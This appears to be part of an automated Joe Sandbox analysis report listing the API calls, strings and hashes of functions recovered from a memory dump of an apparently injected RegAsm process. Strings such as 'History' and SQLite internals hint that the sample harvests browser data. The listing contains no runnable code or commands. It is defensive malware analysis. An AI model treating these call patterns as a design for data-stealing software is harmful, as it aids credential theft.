                                                                                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                • API String ID: 999028693-502967061
                                                                                                                                                                                APIs
                                                                                                                                                                                • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                  • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memsetstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2350177629-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                • API String ID: 2221118986-1606337402
                                                                                                                                                                                APIs
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                • memcmp.MSVCRT ref: 00408FB3
                                                                                                                                                                                • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                • memcmp.MSVCRT ref: 00409025
                                                                                                                                                                                • memset.MSVCRT ref: 00409042
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 265355444-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4131475296-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFilefreememset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                • free.MSVCRT ref: 00417544
                                                                                                                                                                                • free.MSVCRT ref: 00417562
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                                • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                                • free.MSVCRT ref: 0041822B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PathTemp$free
                                                                                                                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: gj
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@$free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2241099983-0
                                                                                                                                                                                • Opcode ID: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                                                                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                • Opcode Fuzzy Hash: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                                                                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                APIs
                                                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                • free.MSVCRT ref: 004174E4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4053608372-0
                                                                                                                                                                                • Opcode ID: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                                                                                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                • Opcode Fuzzy Hash: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                                                                                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1471605966-0
                                                                                                                                                                                • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                • String ID: \StringFileInfo\
                                                                                                                                                                                • API String ID: 102104167-2245444037
                                                                                                                                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memicmpwcslen
                                                                                                                                                                                • String ID: @@@@$History
                                                                                                                                                                                • API String ID: 1872909662-685208920
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                • memset.MSVCRT ref: 00410112
                                                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                • String ID: </%s>
                                                                                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                • String ID: caption
                                                                                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                                                • API String ID: 210187428-168460110
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                • String ID: edit
                                                                                                                                                                                • API String ID: 2747424523-2167791130
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041D8CB
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041D913
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
